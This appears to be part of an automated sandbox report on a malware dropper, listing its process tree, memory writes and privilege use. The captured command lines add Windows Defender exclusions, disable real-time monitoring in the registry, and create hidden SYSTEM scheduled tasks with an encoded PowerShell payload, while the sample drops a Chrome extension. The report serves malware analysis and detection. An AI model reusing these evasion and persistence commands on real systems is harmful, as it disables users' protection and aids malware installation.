WMIC.exe Token: SeShutdownPrivilege 2100 WMIC.exe Token: SeSystemEnvironmentPrivilege 2100 WMIC.exe Token: SeUndockPrivilege 2100 WMIC.exe Token: SeManageVolumePrivilege 2100 WMIC.exe Token: SeDebugPrivilege 2764 powershell.exe Token: SeAssignPrimaryTokenPrivilege 1488 WMIC.exe Token: SeIncreaseQuotaPrivilege 1488 WMIC.exe Token: SeSecurityPrivilege 1488 WMIC.exe Token: SeTakeOwnershipPrivilege 1488 WMIC.exe Token: SeLoadDriverPrivilege 1488 WMIC.exe Token: SeSystemtimePrivilege 1488 WMIC.exe Token: SeBackupPrivilege 1488 WMIC.exe Token: SeRestorePrivilege 1488 WMIC.exe Token: SeShutdownPrivilege 1488 WMIC.exe Token: SeSystemEnvironmentPrivilege 1488 WMIC.exe Token: SeUndockPrivilege 1488 WMIC.exe Token: SeManageVolumePrivilege 1488 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2456 wrote to memory of 2084 2456 79e8f4fc847eecf2096e96dd5895a371b40a5f9f9533f99ea755210dbc390c17.exe 28 PID 2456 wrote to memory of 2084 2456 79e8f4fc847eecf2096e96dd5895a371b40a5f9f9533f99ea755210dbc390c17.exe 28 PID 2456 wrote to memory of 2084 2456 79e8f4fc847eecf2096e96dd5895a371b40a5f9f9533f99ea755210dbc390c17.exe 28 PID 2456 wrote to memory of 2084 2456 79e8f4fc847eecf2096e96dd5895a371b40a5f9f9533f99ea755210dbc390c17.exe 28 PID 2456 wrote to memory of 2084 2456 79e8f4fc847eecf2096e96dd5895a371b40a5f9f9533f99ea755210dbc390c17.exe 28 PID 2456 wrote to memory of 2084 2456 79e8f4fc847eecf2096e96dd5895a371b40a5f9f9533f99ea755210dbc390c17.exe 28 PID 2456 wrote to memory of 2084 2456 79e8f4fc847eecf2096e96dd5895a371b40a5f9f9533f99ea755210dbc390c17.exe 28 PID 2084 wrote to memory of 3044 2084 Install.exe 29 PID 2084 wrote to memory of 3044 2084 Install.exe 29 PID 2084 wrote to memory of 3044 2084 Install.exe 29 PID 2084 wrote to memory of 3044 2084 Install.exe 29 PID 2084 wrote to memory of 3044 2084 Install.exe 29 PID 2084 wrote to memory of 3044 2084 Install.exe 29 PID 2084 wrote to memory of 3044 2084 Install.exe 29 PID 3044 wrote to memory of 2836 3044 Install.exe 31 PID 3044 wrote to memory of 2836 3044 Install.exe 31 PID 3044 wrote to memory of 2836 3044 Install.exe 31 PID 3044 wrote to memory of 2836 3044 Install.exe 31 PID 3044 wrote to memory of 2836 3044 Install.exe 31 PID 3044 wrote to memory of 2836 3044 Install.exe 31 PID 3044 wrote to memory of 2836 3044 Install.exe 31 PID 2836 wrote to memory of 2896 2836 forfiles.exe 33 PID 2836 wrote to memory of 2896 2836 forfiles.exe 33 PID 2836 wrote to memory of 2896 2836 forfiles.exe 33 PID 2836 wrote to memory of 2896 2836 forfiles.exe 33 PID 2836 wrote to memory of 2896 2836 forfiles.exe 33 PID 2836 wrote to memory of 2896 2836 forfiles.exe 33 PID 2836 wrote to memory of 2896 2836 forfiles.exe 33 PID 2896 wrote to memory of 2912 2896 cmd.exe 34 PID 2896 wrote to memory of 2912 2896 cmd.exe 34 PID 2896 wrote to memory of 2912 2896 cmd.exe 34 PID 2896 wrote to memory of 2912 2896 cmd.exe 34 PID 2896 wrote to memory of 2912 2896 cmd.exe 34 PID 2896 wrote to memory of 2912 2896 cmd.exe 34 PID 2896 wrote to memory of 2912 2896 cmd.exe 34 PID 2912 wrote to memory of 2536 2912 powershell.exe 35 PID 2912 wrote to memory of 2536 2912 powershell.exe 35 PID 2912 wrote to memory of 2536 2912 powershell.exe 35 PID 2912 wrote to memory of 2536 2912 powershell.exe 35 PID 2912 wrote to memory of 2536 2912 powershell.exe 35 PID 2912 wrote to memory of 2536 2912 powershell.exe 35 PID 2912 wrote to memory of 2536 2912 powershell.exe 35 PID 3044 wrote to memory of 1728 3044 Install.exe 36 PID 3044 wrote to memory of 1728 3044 Install.exe 36 PID 3044 wrote to memory of 1728 3044 Install.exe 36 PID 3044 wrote to memory of 1728 3044 Install.exe 36 PID 3044 wrote to memory of 1728 3044 Install.exe 36 PID 3044 wrote to memory of 1728 3044 Install.exe 36 PID 3044 wrote to memory of 1728 3044 Install.exe 36 PID 1500 wrote to memory of 2868 1500 taskeng.exe 41 PID 1500 wrote to memory of 2868 1500 taskeng.exe 41 PID 1500 wrote to memory of 2868 1500 taskeng.exe 41 PID 1500 wrote to memory of 2868 1500 taskeng.exe 41 PID 2868 wrote to memory of 1336 2868 YshyKtE.exe 42 PID 2868 wrote to memory of 1336 2868 YshyKtE.exe 42 PID 2868 wrote to memory of 1336 2868 YshyKtE.exe 42 PID 2868 wrote to memory of 1336 2868 YshyKtE.exe 42 PID 2868 wrote to memory of 1308 2868 YshyKtE.exe 44 PID 2868 wrote to memory of 1308 2868 YshyKtE.exe 44 PID 2868 wrote to memory of 1308 2868 YshyKtE.exe 44 PID 2868 wrote to memory of 1308 2868 YshyKtE.exe 44 PID 468 wrote to memory of 2064 468 taskeng.exe 47 PID 468 wrote to memory of 2064 468 taskeng.exe 47 PID 468 wrote to memory of 2064 468 taskeng.exe 47
Processes
-
C:\Users\Admin\AppData\Local\Temp\79e8f4fc847eecf2096e96dd5895a371b40a5f9f9533f99ea755210dbc390c17.exe"C:\Users\Admin\AppData\Local\Temp\79e8f4fc847eecf2096e96dd5895a371b40a5f9f9533f99ea755210dbc390c17.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2456 -
C:\Users\Admin\AppData\Local\Temp\7zS8B8.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2084 -
C:\Users\Admin\AppData\Local\Temp\7zSB56.tmp\Install.exe.\Install.exe /GdidIh "385137" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:3044 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m ping.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"4⤵
- Suspicious use of WriteProcessMemory
PID:2836 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵
- Suspicious use of WriteProcessMemory
PID:2896 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2912 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2536
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bBfKaGDnIKdTdJZScE" /SC once /ST 22:40:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\AlfnvFYITfbBhKdCN\wtkwQueHWyOnbrX\YshyKtE.exe\" pa /SKdidZN 385137 /S" /V1 /F4⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:1728
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 5044⤵
- Loads dropped DLL
- Program crash
PID:1488
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {F3818936-48E2-4755-ABA5-4BDBC9ADCF92} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Suspicious use of WriteProcessMemory
PID:1500 -
C:\Users\Admin\AppData\Local\Temp\AlfnvFYITfbBhKdCN\wtkwQueHWyOnbrX\YshyKtE.exeC:\Users\Admin\AppData\Local\Temp\AlfnvFYITfbBhKdCN\wtkwQueHWyOnbrX\YshyKtE.exe pa /SKdidZN 385137 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:2868 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "grFQvZZrs" /SC once /ST 10:18:52 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Scheduled Task/Job: Scheduled Task
PID:1336
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "grFQvZZrs"3⤵PID:1308
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "grFQvZZrs"3⤵PID:1828
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:2152
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:1348
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:2480
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:2124
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "glgqgBUWi" /SC once /ST 18:34:58 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Scheduled Task/Job: Scheduled Task
PID:1776
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "glgqgBUWi"3⤵PID:1552
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "glgqgBUWi"3⤵PID:1724
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"3⤵PID:1576
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True4⤵PID:1600
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3024 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2372
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\XwIFwyvoUqntekhn" /t REG_DWORD /d 0 /reg:323⤵PID:2728
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\XwIFwyvoUqntekhn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2336
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\XwIFwyvoUqntekhn" /t REG_DWORD /d 0 /reg:643⤵PID:1876
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\XwIFwyvoUqntekhn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2136
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\XwIFwyvoUqntekhn" /t REG_DWORD /d 0 /reg:323⤵PID:2668
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\XwIFwyvoUqntekhn" /t REG_DWORD /d 0 /reg:324⤵PID:2580
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\XwIFwyvoUqntekhn" /t REG_DWORD /d 0 /reg:643⤵PID:2604
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\XwIFwyvoUqntekhn" /t REG_DWORD /d 0 /reg:644⤵PID:2572
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\XwIFwyvoUqntekhn\ehXUouLk\jDVXKsetyQtKTSoA.wsf"3⤵PID:2536
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\XwIFwyvoUqntekhn\ehXUouLk\jDVXKsetyQtKTSoA.wsf"3⤵
- Modifies data under HKEY_USERS
PID:2748 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RNplELueU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2752
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RNplELueU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1584
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fLdzueVMGzfAC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:3036
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fLdzueVMGzfAC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:396
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nWWVEJXizSHU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2872
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nWWVEJXizSHU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2892
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uYPtQNsySKcOueCgHDR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2924
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uYPtQNsySKcOueCgHDR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:3056
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ushFnVEJKMUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2164
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ushFnVEJKMUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1636
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\evUSZSaqPkAEukVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1392
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\evUSZSaqPkAEukVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1856
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1256
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1308
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AlfnvFYITfbBhKdCN" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1844
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AlfnvFYITfbBhKdCN" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2984
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\XwIFwyvoUqntekhn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1944
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\XwIFwyvoUqntekhn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2340
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RNplELueU" /t REG_DWORD /d 0 /reg:324⤵PID:1480
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RNplELueU" /t REG_DWORD /d 0 /reg:644⤵PID:380
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fLdzueVMGzfAC" /t REG_DWORD /d 0 /reg:324⤵PID:1476
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fLdzueVMGzfAC" /t REG_DWORD /d 0 /reg:644⤵PID:2548
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nWWVEJXizSHU2" /t REG_DWORD /d 0 /reg:324⤵PID:2976
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nWWVEJXizSHU2" /t REG_DWORD /d 0 /reg:644⤵PID:332
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uYPtQNsySKcOueCgHDR" /t REG_DWORD /d 0 /reg:324⤵PID:1792
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uYPtQNsySKcOueCgHDR" /t REG_DWORD /d 0 /reg:644⤵PID:2260
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ushFnVEJKMUn" /t REG_DWORD /d 0 /reg:324⤵PID:2124
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ushFnVEJKMUn" /t REG_DWORD /d 0 /reg:644⤵PID:2392
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\evUSZSaqPkAEukVB" /t REG_DWORD /d 0 /reg:324⤵PID:1328
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\evUSZSaqPkAEukVB" /t REG_DWORD /d 0 /reg:644⤵PID:2208
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵PID:764
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵PID:2224
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AlfnvFYITfbBhKdCN" /t REG_DWORD /d 0 /reg:324⤵PID:1096
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AlfnvFYITfbBhKdCN" /t REG_DWORD /d 0 /reg:644⤵PID:376
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\XwIFwyvoUqntekhn" /t REG_DWORD /d 0 /reg:324⤵PID:2304
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\XwIFwyvoUqntekhn" /t REG_DWORD /d 0 /reg:644⤵PID:1676
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gVQmISyna" /SC once /ST 13:14:00 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Scheduled Task/Job: Scheduled Task
PID:2400
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gVQmISyna"3⤵PID:2816
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gVQmISyna"3⤵PID:2556
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:2536
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:2828
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:2248
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:1532
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "QVuDljbAZykxnpoWI" /SC once /ST 07:18:32 /RU "SYSTEM" /TR "\"C:\Windows\Temp\XwIFwyvoUqntekhn\ooWCIvMMypBCeYz\ooklDxj.exe\" Cc /uSIedidyt 385137 /S" /V1 /F3⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:3048
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "QVuDljbAZykxnpoWI"3⤵PID:2320
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2868 -s 4803⤵
- Loads dropped DLL
- Program crash
PID:2884
-
-
-
C:\Windows\Temp\XwIFwyvoUqntekhn\ooWCIvMMypBCeYz\ooklDxj.exeC:\Windows\Temp\XwIFwyvoUqntekhn\ooWCIvMMypBCeYz\ooklDxj.exe Cc /uSIedidyt 385137 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:396 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bBfKaGDnIKdTdJZScE"3⤵PID:2932
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &3⤵PID:1556
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"4⤵PID:892
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵PID:1752
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2804 -
